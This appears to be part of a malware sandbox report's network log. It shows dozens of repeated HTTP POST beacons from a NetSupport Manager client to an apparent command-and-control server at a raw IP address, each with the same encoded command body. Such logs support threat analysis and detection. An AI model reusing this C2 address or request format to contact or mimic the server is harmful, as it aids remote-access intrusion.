                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:16.978048086 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.078969955 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.179560900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.280034065 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.380836010 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.481266975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.580910921 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.682177067 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.782299042 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.883023977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:17.983036041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.083870888 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.184880018 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.284857988 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.385843039 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.486031055 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.586883068 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.687993050 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.788937092 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.888791084 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:18.989073992 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.090207100 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.191160917 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.291876078 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.391880035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.491859913 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.592842102 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.693030119 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.794022083 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.894927979 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:19.995878935 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.096098900 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.196805954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.296824932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.396994114 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.498136044 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.597852945 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.697849035 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.797969103 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.897877932 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:20.997900963 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.098856926 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.199042082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.298954964 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.399846077 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.499840975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.600878954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.701864958 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.802052975 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:21.902861118 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.002861977 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.103120089 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.211040020 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.411866903 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.511945009 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.612848043 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.712846041 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.813771963 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:22.913774967 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.014823914 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.115875006 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.215924978 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.317032099 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.417045116 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.517210960 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.617827892 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.718832970 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.819899082 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:23.921479940 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.020787954 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:35:24.155416965 CET284OUTPOST http://95.142.47.11/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 95.142.47.11Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg
                                                                                                                                                                                                                                                                        Data Raw:
